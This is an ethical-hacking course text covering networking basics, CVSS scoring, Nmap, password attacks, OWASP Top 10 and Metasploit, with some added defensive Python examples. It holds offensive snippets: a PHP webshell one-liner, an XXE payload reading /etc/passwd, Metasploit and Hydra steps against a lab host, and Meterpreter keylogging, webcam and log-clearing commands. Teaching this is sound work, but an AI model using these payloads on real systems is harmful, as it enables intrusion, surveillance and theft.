Ethical Hacking Course


Chapter 1: Introduction
Chapter 2: Network
Chapter 3: How The Web Works
Chapter 4: Install Kali Linux & Linux Command
Chapter 5: Exploit & CVE
Chapter 6: Information Gathering (Recon)
Chapter 7: Burp Suite
Chapter 8: Password Attack
Chapter 9: Shell
Chapter 10: Wireshark
Chapter 11: Network Service Attack
Chapter 12: OWASP 10
Chapter 13: Web Hacking
Chapter 14: Metasploit
Chapter 15: Active Directory
Chapter 16: Wi-Fi Hacking
Chapter 17: Capture The Flag (CTF)

Chapter 1
Introduction

Chapter 2
Network

IP Addresses:
Briefly, an IP address (or Internet Protocol address) is a way of identifying a host on a
network for a period of time; that same IP address can later be associated with another
device without the address itself changing. First, let's split up precisely what an IP
address is in the diagram below:

An IP address is a set of numbers divided into four octets. The values of the four octets,
taken together, form the IP address of the device on the network. This number is
calculated through a technique known as IP addressing & subnetting.
What's important to understand here is that IP addresses can change from device to
device, but the same IP address cannot be active on more than one device at the same
time within the same network.

Two devices on the same local network can use their private IP addresses to
communicate with each other. However, any data sent to the Internet from either of
these devices will be identified by the same public IP address. Public IP addresses are
given by your Internet Service Provider (or ISP).

There are two types of IP address: IPv4 and IPv6.

MAC Address:
Devices on a network will all have a physical network interface, which is a microchip
board found on the device's motherboard. This network interface is assigned a unique
address at the factory it was built at, called a MAC (Media Access Control) address.
The MAC address is a twelve-character hexadecimal number (base sixteen is a
numbering system used in computing to represent numbers) split into six pairs
separated by colons. The colons are only separators. For example,
a4:c3:f0:85:ac:2d. The first six characters identify the company that made the network
interface, and the last six are a unique number for that interface.
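The two address formats above can be checked programmatically. The following is an added example, not part of the course material: it validates a dotted-quad IPv4 address and classifies it as private or public using the standard library, and splits a MAC address into the vendor (OUI) part and the interface-specific part. It also reads two flag bits of the first MAC octet (locally administered and multicast), which is standard IEEE 802 behaviour the course text does not cover. All sample addresses are constructed.

```python
import ipaddress
import re

# Constructed sample inputs (not taken from the course).
SAMPLE_IPS = ["192.168.1.10", "10.0.5.7", "104.26.10.229", "256.1.1.1"]
SAMPLE_MACS = ["a4:c3:f0:85:ac:2d", "02:42:ac:11:00:02", "01:00:5e:00:00:fb"]


def classify_ipv4(text):
    """Return (octets, 'private' | 'public' | 'invalid') for a dotted-quad string."""
    try:
        addr = ipaddress.IPv4Address(text)
    except ipaddress.AddressValueError:
        return None, "invalid"
    octets = [int(o) for o in text.split(".")]
    # is_private covers the RFC 1918 ranges (10/8, 172.16/12, 192.168/16)
    # as well as loopback, link-local and similar reserved space.
    return octets, "private" if addr.is_private else "public"


# Six hex pairs separated by colons, as in the course's a4:c3:f0:85:ac:2d example.
MAC_RE = re.compile(r"^([0-9a-f]{2})(?::([0-9a-f]{2})){5}$", re.IGNORECASE)


def split_mac(text):
    """Split a colon-separated MAC into its OUI (vendor) and NIC-specific halves.

    Returns None when the string is not a well-formed MAC. The two flag bits
    come from the first octet: bit 1 = locally administered (software-assigned,
    e.g. a container or VM), bit 0 = multicast/group address.
    """
    if not MAC_RE.match(text):
        return None
    octets = text.lower().split(":")
    first = int(octets[0], 16)
    return {
        "oui": ":".join(octets[:3]),
        "nic": ":".join(octets[3:]),
        "locally_administered": bool(first & 0x02),
        "multicast": bool(first & 0x01),
    }


if __name__ == "__main__":
    for ip in SAMPLE_IPS:
        print(ip, classify_ipv4(ip))
    for mac in SAMPLE_MACS:
        print(mac, split_mac(mac))
```

A locally administered MAC is a useful signal when inventorying a network: it usually means the address was set by software (Docker uses 02:42:..., for instance) rather than burned in at the factory, so the OUI lookup the course describes will not identify a vendor.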

Firewalls: A firewall is a device within a network responsible for determining what
traffic is allowed to enter and exit. Think of a firewall as border security for a network. An
administrator can configure a firewall to permit or deny traffic entering or exiting a
network based on numerous factors, such as:

- Where is the traffic coming from? (has the firewall been told to accept/deny traffic
from a specific network?)
- Where is the traffic going to? (has the firewall been told to accept/deny traffic
destined for a specific network?)
- What port is the traffic for? (has the firewall been told to accept/deny traffic
destined for port 80 only?)
- What protocol is the traffic using? (has the firewall been told to accept/deny traffic
that is UDP, TCP or both?)

Network Services:

What is SMB?: SMB (Server Message Block Protocol) is a client-server communication
protocol used for sharing access to files; SMB runs on Microsoft Windows operating
systems.

What is Telnet?: Telnet lets you connect to and execute commands on a remote machine
that is hosting a Telnet server. It sends all messages in clear text.

What is FTP?: File Transfer Protocol (FTP) is a protocol used to allow remote transfer of
files over a network.

What is NFS?: NFS stands for "Network File System" and allows a system to share
directories and files with others over a network. By using NFS, users and programs can
access files on remote systems almost as if they were local files.

What is SMTP?: SMTP stands for "Simple Mail Transfer Protocol". It is used to handle
the sending of emails in order to support email services.

Chapter 3
How The Web Works

What is DNS?
DNS (Domain Name System) provides a simple way for us to communicate with
devices on the internet without remembering complex numbers. Much like every house
has a unique address for sending mail directly to it, every computer on the internet has
its own unique address to communicate with it called an IP address. An IP address
looks like the following 104.26.10.229, 4 sets of digits ranging from 0 - 255 separated by
a period. When you want to visit a website, it's not exactly convenient to remember this
complicated set of numbers, and that's where DNS can help. So instead of
remembering 104.26.10.229, you can remember tryhackme.com instead.

DNS Record Types:

A Record

These records resolve to IPv4 addresses, 104.26.10.229

AAAA Record

These records resolve to IPv6 addresses, 2606:4700:20::681a:be5

CNAME Record

These records resolve to another domain name, for example, SulyCyberCon online
shop has the subdomain name store.sulycybercon.com which returns a CNAME record
shops.shopify.com.

MX Record

These records resolve to the address of the servers that handle the email for the domain
you are querying; for example, an MX record response for sulycybercon.com would look
something like alt1.aspmx.l.google.com.
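The record types above combine in practice: a CNAME answer has to be followed until an A, AAAA or MX record is reached. As an added example (not from the course), the resolver below walks a constructed table of records, follows CNAME chains, and refuses to loop forever on a misconfigured pair of CNAMEs pointing at each other. The tryhackme.com and sulycybercon.com entries reuse the course's examples; the shops.shopify.com address and the loop-*.example names are invented.

```python
# Constructed zone data for the example; the shops.shopify.com address and the
# loop-a/loop-b names are invented, the rest mirror the course's examples.
RECORDS = {
    "tryhackme.com": [("A", "104.26.10.229"), ("AAAA", "2606:4700:20::681a:be5")],
    "store.sulycybercon.com": [("CNAME", "shops.shopify.com")],
    "shops.shopify.com": [("A", "203.0.113.10")],
    "sulycybercon.com": [("MX", "alt1.aspmx.l.google.com")],
    "loop-a.example": [("CNAME", "loop-b.example")],
    "loop-b.example": [("CNAME", "loop-a.example")],
}


def resolve(name, rtype, records=RECORDS, max_hops=8):
    """Return the values of type rtype for name, following CNAME records.

    A CNAME is followed at most max_hops times, so a loop in the zone raises
    an error instead of recursing without end. Unknown names return [].
    """
    for _ in range(max_hops):
        rrs = records.get(name.rstrip(".").lower(), [])
        values = [value for rr_type, value in rrs if rr_type == rtype]
        if values:
            return values
        cnames = [value for rr_type, value in rrs if rr_type == "CNAME"]
        if not cnames:
            return []
        # A name with a CNAME has no other records, so keep walking the alias.
        name = cnames[0]
    raise RuntimeError(f"CNAME chain for {name} exceeds {max_hops} hops")


def resolve_safely(name, rtype):
    """Like resolve() but reports a loop as the string 'loop' instead of raising."""
    try:
        return resolve(name, rtype)
    except RuntimeError:
        return "loop"


if __name__ == "__main__":
    for query in [("tryhackme.com", "A"), ("tryhackme.com", "AAAA"),
                  ("store.sulycybercon.com", "A"), ("sulycybercon.com", "MX"),
                  ("loop-a.example", "A")]:
        print(query, "->", resolve_safely(*query))
```

Real resolvers cap CNAME chains in the same spirit; a dangling CNAME to a name nobody controls is also worth flagging during reconnaissance of your own domains, since it is the root of subdomain takeover.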

What is HTTP? (HyperText Transfer Protocol)

What is HTTPS? (HyperText Transfer Protocol Secure)

What is a URL? (Uniform Resource Locator)

HTTP methods: POST, GET, OPTIONS, PUT, DELETE

GET Request

This is used for getting information from a web server.

POST Request

This is used for submitting data to the web server and potentially creating new records

PUT Request

This is used for submitting data to a web server to update information

DELETE Request

This is used for deleting information/records from a web server

HTTP Status Codes:

Common HTTP Status Codes:

Cookie: Cookies can be used for many purposes but are most commonly used for
website authentication.

Chapter 4
Install Kali Linux
&
Linux Command

Chapter 5
Exploit & CVE
Exploit:
An exploit is a piece of software or a script that allows hackers to take control of a
system by taking advantage of its vulnerabilities.

1. SearchSploit
2. Exploit-DB
3. Metasploit

Common Vulnerabilities and Exposures (CVE):

A classic example of a CVE is the recent Log4j vulnerability report (CVE-2021-44228). It
contains detailed information about a vulnerability of the popular Java logging
framework, Apache Log4j. Many service providers, like AWS, Cloudflare and Twitter,
were affected by this vulnerability.

Common Vulnerability Scoring System (CVSS):

Introduction:
When you are submitting a vulnerability report to a company, it is very important to be
able to communicate your findings in a clear and concise manner, where the security or
triage team receiving your report are able to reproduce it as quickly as possible.

Attack Vector:
Describing the 4 scenarios in more depth: a Network (remote) attack vector is when the
exploit can be delivered over the Internet, an Adjacent attack vector is when the
malicious actor is inside the same intranet as the victim, a Local attack vector is when
the issue lies at the level of operating system accounts, and finally a Physical attack
vector is when you can physically access the victim's device.

Attack Complexity:
Does the exploit require additional information about the target, such as unguessable
IDs, a certain configuration or settings, valid credentials (e.g. for MFA issues), or some
other condition, in order to work?

Privileges Required:
If the vulnerable component is within an admin panel, we recommend setting the
requirement to "High"; for a vulnerability where you need to be invited to an
organization by an admin (and self-registration is not possible), we recommend setting
the privileges required to "Low".

User Interaction
Whether the vulnerability can be exploited solely at the will of the attacker, or whether a
separate user (or user-initiated process) must participate in some manner. The score is
highest when no user interaction is required, since requiring it adds a further step to the
exploitability of the attack.

Scope
Does a successful attack impact a component other than the vulnerable component? If
so, the score increases and the Confidentiality, Integrity and Availability metrics should
be scored relative to the impacted component.

Confidentiality
The impact on the confidentiality of the information resources managed by the software
due to a successfully exploited vulnerability. Confidentiality refers to limiting information
access and disclosure to only authorized users, as well as preventing access by, or
disclosure to, unauthorized ones.

Integrity
The impact on the integrity of the information resources due to a successfully exploited
vulnerability. Integrity refers to the trustworthiness and veracity of information.

Availability
The impact on the availability of the impacted component resulting from a successfully
exploited vulnerability. It refers to the loss of availability of the impacted component
itself, such as a networked service (e.g., web, database, email). Since availability refers
to the accessibility of information resources, attacks that consume network bandwidth,
processor cycles, or disk space all impact the availability of an impacted component.

Examples

Stored XSS from an authenticated user to an unauthenticated user:

- Attack Vector: Network, as the attack can be done over the Internet
- Attack Complexity: Low, as there are no particular premises needed for this
attack to be successful
- Privileges Required: None if the attacker can deliver the payload while
unauthenticated. Or we can set it to Low if the attacker needs to be
authenticated in order to deliver the payload
- User Interaction: Required in case the user has to do some non-basic interaction
with the website in order to trigger the payload (like clicking a link). None in case
the victim only needs to visit the homepage or do very trivial interactions with the
website
- Scope: Changed, since the vulnerable component is the web server and the
impacted component is the browser
- Confidentiality: Low if access to the DOM is granted. None if there is no
access to the DOM
- Integrity: Low, since XSS can always cause defacement
- Availability: None, because the application can still be used by the victims

Stored XSS from an admin to a user:
- Attack Vector: Network, as the attack can be done over the Internet
- Attack Complexity: Low, as there are no particular premises needed for this
attack to be successful
- Privileges Required: High, because the attacker needs to be an admin in order
for this vulnerability to be exploited
- User Interaction: Required in case the user has to do some non-basic interaction
with the website in order to trigger the payload (like clicking a link). None in case
the victim only needs to visit the homepage or do very trivial interactions with the
website
- Scope: Changed, since the vulnerable component is the web server and the
impacted component is the browser
- Confidentiality: Low if access to the DOM is granted, None if there is no access
to the DOM
- Integrity: Low, as XSS can always cause defacement
- Availability: None, because the application can still be used by the victims

IDOR with access to read and modify personally identifiable information (PII):

- Attack Vector: Network, as the attack can be done over the Internet
- Attack Complexity: High if the IDs are UUIDs or high-entropy IDs. Low if they are
sequential IDs
- Privileges Required: Low, as the attacker needs to be logged in to perform the
attack
- User Interaction: None, as this is solely a server-side issue
- Scope: Unchanged, as the impacted and the vulnerable component are the same,
i.e. the web server
- Confidentiality: High, because it gives access to PII
- Integrity: High, because the attacker can delete/modify data
- Availability: None, because the application can still be used by the victims

Full-response SSRF vs Blind SSRF:
- Attack Vector: Network, as the attack can be done over the Internet
- Attack Complexity: Low, since the attack is normally straightforward
- Privileges Required: Low/High according to the level of privilege of the account
linked to the vulnerable functionality
- User Interaction: None, as this is solely a server-side issue
- Scope: Unchanged in case of local port scanning, as the impacted component
remains the web server. Changed if AWS credential or local file exfiltration is
possible, since the impacted component is then the cloud infrastructure
- Confidentiality: Low/High depending on the type of information shown. None in
case of Blind SSRF (no output)
- Integrity: High in case AWS credentials are leaked, as it could lead to RCE. Low in
case the attacker can only reach the intranet or AWS
- Availability: None, because the application can still be used even if this has been
fully exploited (this does not include some edge cases where SSRF can take
down a service)

Chapter 6
Information Gathering (Recon)
1. Passive Reconnaissance:
Information you can gather from publicly available resources without directly
engaging with the target.
1. Whois
2. Shodan
3. GitHub
4. Wayback Machine
5. Google

2. Active Reconnaissance:
Active reconnaissance requires you to make some kind of contact with your
target. This contact can be a phone call or a visit to the target company.

1. Visit the company web site
2. Ping
3. Ncat
4. Traceroute
5. Telnet
6. Nmap

Nmap:
Subnets with /16: a subnet of this size can have around 65 thousand hosts.
Subnets with /24: a subnet of this size can have around 250 hosts.

FIN Scan: The FIN scan sends a TCP packet with the FIN flag set, no response will be
sent if the TCP port is open. Again, Nmap cannot be sure if the port is open or if a
firewall is blocking the traffic related to this TCP port.

Nmap target specification:
range: 10.11.12.15-20
subnet: 10.11.12.15/24
list of hosts from a file: nmap -iL list_of_hosts.txt

Service Detection:
Adding -sV to your Nmap command will collect and determine service and version
information for the open ports. You can control the intensity with --version-intensity
LEVEL, where the level ranges between 0, the lightest, and 9, the most complete.
-sV --version-light has an intensity of 2, while -sV --version-all has an intensity of 9.

OS Detection:
Nmap Script Engine (NSE):

You can run the default scripts with -sC, a whole script category with --script=vuln, or a
single script with --script "http-csrf.nse", like this:
nmap -sC MACHINE_IP
nmap --script=vuln MACHINE_IP
nmap --script "http-csrf.nse" MACHINE_IP
Saving the Output:
The three main formats are:
1. Normal
2. Grepable (greppable)
3. XML
Normal: -oN FILENAME
Grepable: the grepable format takes its name from the command grep.
-oG FILENAME
XML: -oX FILENAME
You can save the scan output in all three formats at once using -oA FILENAME
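The grepable (-oG) format exists so that scan results can be post-processed by other tools. The parser below is an added example, not from the course or from the Nmap project: it reads -oG output (a constructed sample is embedded, in the real line layout of one "Host:" line per host with tab-separated "Ports:" fields) and builds an inventory of open ports and detected versions, which is what a defender needs to spot an exposed or outdated service across a subnet. The IP addresses and version strings in the sample are made up.

```python
# Constructed sample of nmap -sV -oG output (the "\t" escapes become real tabs).
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample) as: nmap -sV -oG scan.gnmap 192.168.1.0/24
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/, 80/open/tcp//http//nginx 1.18.0/, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: closed (998)
# Nmap done (constructed sample)
"""


def parse_gnmap(text):
    """Return {ip: [(port, proto, service, version), ...]} for open ports only.

    Each Ports: entry is port/state/proto/owner/service/rpc-info/version/ and
    entries are separated by ", ".
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comments and other lines
        fields = line.split("\t")
        ip = fields[0].split()[1]         # "Host: 192.168.1.1 ()" -> 192.168.1.1
        hosts.setdefault(ip, [])
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                parts = entry.split("/")
                port, state, proto, _owner, service, _rpc, version = parts[:7]
                if state == "open":
                    hosts[ip].append((int(port), proto, service, version))
    return hosts


def hosts_running(text, needle):
    """IPs whose detected version string contains needle, e.g. a known-bad release."""
    return sorted(
        ip for ip, ports in parse_gnmap(text).items()
        if any(needle in version for _, _, _, version in ports)
    )


if __name__ == "__main__":
    for ip, ports in parse_gnmap(SAMPLE_GNMAP).items():
        print(ip, ports)
    print("vsftpd 2.3.4 seen on:", hosts_running(SAMPLE_GNMAP, "vsftpd 2.3.4"))
```

Filtering on a version string is how the same output turns into a patch-management check: the course's later vsftpd 2.3.4 example is exactly the kind of release an inventory like this should flag before an attacker finds it.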

Script Category | Description
auth | Authentication related scripts
broadcast | Discover hosts by sending broadcast messages
brute | Performs brute-force password auditing against logins
default | Default scripts, same as -sC
discovery | Retrieve accessible information, such as database tables and DNS names
dos | Detects servers vulnerable to Denial of Service (DoS)
exploit | Attempts to exploit various vulnerable services
external | Checks using a third-party service, such as Geoplugin and VirusTotal
fuzzer | Launch fuzzing attacks
intrusive | Intrusive scripts such as brute-force attacks and exploitation
malware | Scans for backdoors
safe | Safe scripts that won't crash the target
version | Retrieve service versions
vuln | Checks for vulnerabilities or exploits vulnerable services

SWITCH | EXAMPLE | DESCRIPTION
-sV | nmap 192.168.1.1 -sV | Attempts to determine the version of the service running on a port
-sV --version-intensity | nmap 192.168.1.1 -sV --version-intensity 8 | Intensity level 0 to 9. A higher number increases the possibility of correctness
-sV --version-light | nmap 192.168.1.1 -sV --version-light | Enable light mode. Lower possibility of correctness. Faster
-sV --version-all | nmap 192.168.1.1 -sV --version-all | Enable intensity level 9. Higher possibility of correctness. Slower
-A | nmap 192.168.1.1 -A | Enables OS detection, version detection, script scanning, and traceroute

Chapter 7
Burp Suite
What is Burp Suite used for?

1. FoxyProxy
2. Setting up the Burp certificate
3. Dashboard
4. Target
5. Proxy
6. Intruder
7. Repeater
8. Decoder
9. Extensions
10. Burp Collaborator Client

Chapter 8
Password Attack
Offline Password Attack:

Dictionary Attack: uses a list of candidate passwords, known as a wordlist.

1. Cracking hashes
2. Cracking ZIP/RAR passwords

Tools:
1. John
2. Hashcat
3. Hashid

Brute-Force Attack: tries every combination of characters (for example, all digit
sequences) to crack a password hash.

Tools:
1. Hashcat
2. John

Online Password Attack:
Before starting an online attack, try the default credentials; only then start the attack.

Default Credentials:
1- https://default-password.info/
2- https://datarecovery.com/rd/default-passwords/
3- https://cirt.net/passwords?vendor=3COM
4-
crackstation.net is an online tool used for cracking hashes.

Tool:
Hydra: Hydra can be used to attack:
1- HTTP
2- HTTPS
3- FTP
4- SSH
5- SMTP
6- SMB

Chapter 9
Shell
WebShells:
When we can upload code to the server, we use this opportunity to upload a webshell
instead of a full program:

<?php echo shell_exec($_GET["cmd"])?>

Reverse Shell:
A reverse shell, also known as a remote shell or "connect-back shell," is a shell in which
the target machine connects back to a listener on the attacker's machine, giving the
attacker a command shell on the target.
listener: nc -lvnp <PORT>
We can use pentestmonkey for a PHP reverse shell:
1. PHP-Reverse-Shell
2. Reverse-shell-generator
3. PayloadAllTheThings-Shell

Chapter 10
Wireshark
Wireshark, a tool used for creating and analyzing PCAPs (network packet capture files),
is commonly regarded as one of the best packet analysis tools.

Filtering Operators:

- and: and / &&
- or: or / ||
- equals: eq / ==
- not equal: ne / !=
- greater than: gt / >
- less than: lt / <

Basic Filtering:
ip.addr == <IP Address>
ip.src == <SRC IP> and ip.dst == <DST IP>
tcp.port eq <Port #> or <Protocol Name>
udp.port eq <Port #> or <Protocol Name>

- Frame (Layer 1) -- This will show you what frame / packet you are looking at, as
well as details specific to the Physical layer of the OSI model.

- Source [MAC] (Layer 2) -- This will show you the source and destination MAC
addresses, from the Data Link layer of the OSI model.

- Source [IP] (Layer 3) -- This will show you the source and destination IPv4
addresses, from the Network layer of the OSI model.

- Protocol (Layer 4) -- This will show you details of the protocol used (UDP/TCP)
along with source and destination ports, from the Transport layer of the OSI
model.

- Protocol Errors -- This is a continuation of the 4th layer, showing specific
segments from TCP that needed to be reassembled.

- Application Protocol (Layer 5) -- This will show details specific to the protocol
being used, such as HTTP, FTP, SMB, etc., from the Application layer of the OSI
model.

- Application Data -- This is an extension of layer 5 that can show the application-
specific data.
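To make the operator table and the basic filters concrete, here is an added example (not from the course or from Wireshark) of a tiny display-filter evaluator run over three constructed packets. It supports the operators listed above, the and/or combinators evaluated left to right without parentheses, and the convenience fields ip.addr, tcp.port and udp.port, which match either direction just as they do in Wireshark. The packet contents are invented; "ne" is implemented as "true for every direction", matching current Wireshark semantics for !=.

```python
import operator

OPS = {
    "eq": operator.eq, "==": operator.eq,
    "ne": operator.ne, "!=": operator.ne,
    "gt": operator.gt, ">": operator.gt,
    "lt": operator.lt, "<": operator.lt,
}

# Constructed packets (not a real capture); field names mirror Wireshark's.
PACKETS = [
    {"ip.src": "10.0.0.5", "ip.dst": "93.184.216.34", "tcp.srcport": 51514, "tcp.dstport": 80},
    {"ip.src": "10.0.0.5", "ip.dst": "10.0.0.53", "udp.srcport": 41000, "udp.dstport": 53},
    {"ip.src": "198.51.100.7", "ip.dst": "10.0.0.5", "tcp.srcport": 4444, "tcp.dstport": 51515},
]


def field_values(pkt, field):
    """Expand ip.addr / tcp.port / udp.port to both directions; others map to one value."""
    if field == "ip.addr":
        return [pkt.get("ip.src"), pkt.get("ip.dst")]
    if field in ("tcp.port", "udp.port"):
        proto = field.split(".")[0]
        return [pkt.get(f"{proto}.srcport"), pkt.get(f"{proto}.dstport")]
    return [pkt.get(field)]


def matches(pkt, expr):
    """Evaluate 'field op value [and|or field op value ...]' left to right."""
    tokens = expr.split()
    result, combine, i = None, None, 0
    while i < len(tokens):
        field, op, raw = tokens[i], tokens[i + 1], tokens[i + 2]
        value = int(raw) if raw.isdigit() else raw
        vals = [v for v in field_values(pkt, field) if v is not None]
        if op in ("ne", "!="):
            # "not equal" must hold for every direction; absent field counts as unequal.
            term = all(v != value for v in vals)
        else:
            # every other operator needs one direction to satisfy it.
            term = any(OPS[op](v, value) for v in vals)
        if combine is None:
            result = term
        elif combine in ("and", "&&"):
            result = result and term
        else:
            result = result or term
        i += 3
        if i < len(tokens):
            combine = tokens[i]
            i += 1
    return bool(result)


def apply_filter(expr, packets=PACKETS):
    """Return the packets that satisfy a filter expression."""
    return [p for p in packets if matches(p, expr)]


if __name__ == "__main__":
    for f in ["ip.addr == 10.0.0.5", "tcp.port eq 80 or udp.port eq 53",
              "tcp.dstport gt 1024 and ip.src ne 10.0.0.5"]:
        print(f, "->", len(apply_filter(f)), "packet(s)")
```

The last filter in the demo is the kind of thing an analyst writes when hunting for an inbound connection to a high port from outside the local range, which is what the third constructed packet looks like.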

Chapter 11
Network Service Attack
FTP (File Transfer Protocol):
Enumeration FTP:

The FTP port is open; let's try an Nmap script to scan FTP.

Exploit FTP:

Using Metasploit to exploit (the FTP version is vsftpd 2.3.4):

1. msfconsole
2. search exploit vsftpd 2.3.4
3. use exploit/unix/ftp/vsftpd_234_backdoor
4. options
5. set RHOSTS 192.168.116.132
6. exploit

Secure Shell (SSH):

Enumeration SSH:

This site is vulnerable to LFI. We can look at /etc/passwd and see the usernames.

Exploit SSH:

┌─[wolfkissed@parrot]─[~/Desktop]
└──╼ $hydra -l msfadmin -P wordlist.txt ssh://192.168.116.132

Network File System (NFS):
Enumeration NFS:

Exploit NFS:

Create an SSH key and put it into the NFS directory.

SMB:
Enumeration SMB:

Using enum4linux -a IP

Exploit SMB:

Download the SSH key id_rsa

Not working; let's download id_rsa.pub instead

Chapter 12
OWASP 10
1- Command Injection:

2- Broken Authentication:

We create a darren username with a trailing space (darren )

3- Sensitive Data Exposure:

We found a database file

4- XML External Entity:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

5- Broken Access Control (IDOR):

We are the noot user; let's change /note.php?note=1 to 0

We get the flag

6- Security Misconfiguration:

- Poorly configured permissions on cloud services, like S3 buckets
- Having unnecessary features enabled, like services, pages, accounts or privileges
- Default accounts with unchanged passwords
- Error messages that are overly detailed and allow an attacker to find out more about
the system
- Not using HTTP security headers, or revealing too much detail in the Server: HTTP
header
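The last bullet is easy to check automatically. As an added example (not from the course), the function below audits a response-header dictionary for a baseline set of security headers and for a Server or X-Powered-By header that leaks version information, and runs it over a constructed weak response and a constructed hardened one. The header set and the sample values are my choices, not a complete hardening standard.

```python
# Baseline headers a hardened response should carry; the values are illustrative.
EXPECTED = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
}


def audit_headers(headers):
    """Return a list of findings for a response header dict (names are case-insensitive)."""
    lower = {name.lower(): value for name, value in headers.items()}
    findings = []
    for name in EXPECTED:
        if name.lower() not in lower:
            findings.append(f"missing {name}")
    server = lower.get("server", "")
    # A bare product name is acceptable; a version string is the over-sharing the
    # course warns about in the Server: header.
    if any(ch.isdigit() for ch in server):
        findings.append(f"Server header reveals version: {server!r}")
    if "x-powered-by" in lower:
        findings.append(f"X-Powered-By reveals stack: {lower['x-powered-by']!r}")
    return findings


# Constructed responses for the demo: the weak one leaks versions and lacks every
# baseline header, the hardened one fixes both.
WEAK = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "Content-Type": "text/html",
}
HARDENED = {"Server": "Apache", "Content-Type": "text/html", **EXPECTED}

if __name__ == "__main__":
    print("weak:", audit_headers(WEAK))
    print("hardened:", audit_headers(HARDENED))
```

On a real engagement you would feed this the headers from a captured response (Burp's Proxy history or curl -I) rather than a dictionary, but the checks are the same.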

7- Cross-site Scripting (XSS):
1. Reflected XSS
2. Stored XSS
3. DOM-based XSS
<script>alert('xss-wolfkissed');</script>
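The payload above only executes because the application writes user input into HTML without encoding it. The following added example (not from the course) places a vulnerable template beside the fixed one: the same payload is rendered by each, and a small check shows which output still contains an executable script tag. The rendering functions are invented for the example; html.escape is the standard-library function doing the real work.

```python
import html

# The course's test payload.
PAYLOAD = "<script>alert('xss-wolfkissed');</script>"


def render_vulnerable(name):
    """Untrusted input concatenated straight into HTML: the browser executes it."""
    return f"<p>Hello, {name}</p>"


def render_safe(name):
    """html.escape turns < > & ' " into entities, so the payload is displayed, not run."""
    return f"<p>Hello, {html.escape(name, quote=True)}</p>"


def contains_active_script(markup):
    """Crude detector: does the markup still contain a raw <script tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for render in (render_vulnerable, render_safe):
        out = render(PAYLOAD)
        print(f"{render.__name__}: executable={contains_active_script(out)}\n  {out}")
```

Output encoding is context-specific: html.escape is right for text placed in an HTML element or a quoted attribute, while data inserted into a script block, a URL or a CSS value needs the encoding for that context. Reflected and stored XSS are both fixed on the server this way; DOM-based XSS needs the same discipline in the client-side JavaScript that writes to the page.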

8- Local File Inclusion (LFI) & Remote File Inclusion (RFI)

9- SQL Injection
10- SSRF

Chapter 13
Web Hacking
Walking An Application:
1- Viewing The Page Source
2- Developer Tools - Inspector
3- Developer Tools - Debugger
4- Developer Tools - Network

Content Discovery:
1- Manual Discovery - Robots.txt
2- Manual Discovery - Sitemap.xml
3- Manual Discovery - HTTP Headers
4- Manual Discovery - Framework Stack
5- OSINT - Google Hacking / Dorking
6- OSINT - Wappalyzer
7- OSINT - Wayback Machine
8- OSINT - GitHub
9- Automation - Fuzzing

Subdomain Enumeration:
1. Sublist3r
2. Assetfinder
3. subEnum
4. Google Dorking
5. Vhost Fuzzing

Web Vulnerabilities
1. IDOR
2. SQL Injection
3. Command Injection
4. SSRF
5. Cross-Site Scripting
6. Authentication Bypass
7. File Upload

Chapter 14
Metasploit
Metasploit:
Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool
that can support all phases of a penetration testing engagement, from information
gathering to post-exploitation.

Type msfconsole to start Metasploit.

You can run OS commands inside Metasploit.

Metasploit Commands:

use: select an exploit (module)
show payloads: show all payloads
options: show all options that need a value
background: put the session in the background
sessions: list sessions
set: set a value
setg: set a global value that remains if you change module
unset: clear a value
back: leave the exploit context
search: search for an exploit
exploit: run the exploit
exploit -z: run the exploit in the background
check: check if the target system is vulnerable without exploiting it

Metasploit Meterpreter:
msfvenom --list payloads: show all payloads
Meterpreter commands:

Core commands will be helpful to navigate and interact with the target system. Below
are some of the most commonly used. Remember to check all available commands
running the help command once a Meterpreter session has started.

Commands:
background: Backgrounds the current session
exit: Terminates the Meterpreter session
guid: Gets the session GUID (Globally Unique Identifier)
help: Displays the help menu
info: Displays information about a Post module
irb: Opens an interactive Ruby shell on the current session
load: Loads one or more Meterpreter extensions
migrate: Allows you to migrate Meterpreter to another process
run: Executes a Meterpreter script or Post module
sessions: Quickly switch to another session

File system commands

cd: Will change directory
ls: Will list files in the current directory (dir will also work)
pwd: Prints the current working directory
edit: Will allow you to edit a file
cat: Will show the contents of a file on the screen
rm: Will delete the specified file
search: Will search for files
upload: Will upload a file or directory
download: Will download a file or directory

Networking commands

arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table

System commands

clearev: Clears the event logs
execute: Executes a command
getpid: Shows the current process identifier
getuid: Shows the user that Meterpreter is running as
kill: Terminates a process
pkill: Terminates processes by name
ps: Lists running processes
reboot: Reboots the remote computer
shell: Drops into a system command shell
shutdown: Shuts down the remote computer
sysinfo: Gets information about the remote system, such as the OS

Other commands:

idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database

Msfvenom:

msfvenom -l payloads
